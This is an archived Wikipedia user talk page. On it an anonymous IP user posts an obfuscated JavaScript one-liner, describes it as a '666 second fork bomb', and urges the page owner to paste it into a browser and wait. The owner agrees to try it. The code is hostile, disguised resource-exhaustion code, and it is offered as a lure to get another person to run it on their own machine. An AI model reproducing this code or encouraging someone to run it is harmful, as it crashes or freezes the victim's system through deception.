View text source at Wikipedia


User talk:CLCStudent/Archive 56

Archive 50Archive 54Archive 55Archive 56Archive 57Archive 58Archive 60

Fork bomb example

Can you explain what is wrong with my 666 second fork bomb? ((f)=>{setInterval(f,1000);})(((f)=>f(f))((f)=>(n)=>n?((x)=>(y)=>x(f(f)(n-1)(x)(y))):((x)=>(y)=>y))(666)(((x)=>(y)=>y(x))(()=>null))(((f)=>f(f))((f)=>(a)=>(b)=>((b)?(()=>f(f)(a(b))):(()=>(a().pop()()||1)?f(f)(a):0))())(((f)=>f(f))((f)=>(a)=>(b)=>b?f(f)(a.concat(b)):a)([]))(((f)=>f(f))((f)=>async()=>f(f)(f(f)()))))()); 69.5.123.41 (talk) 02:40, 5 October 2019 (UTC)

Try plugging it into your browser and wait 666 seconds? 666 seconds later and it will fork bomb. 69.5.123.41 (talk) 02:42, 5 October 2019 (UTC)
Ok, let me try. CLCStudent (talk) 02:43, 5 October 2019 (UTC)
Did it work? 69.5.123.41 (talk) 03:22, 5 October 2019 (UTC)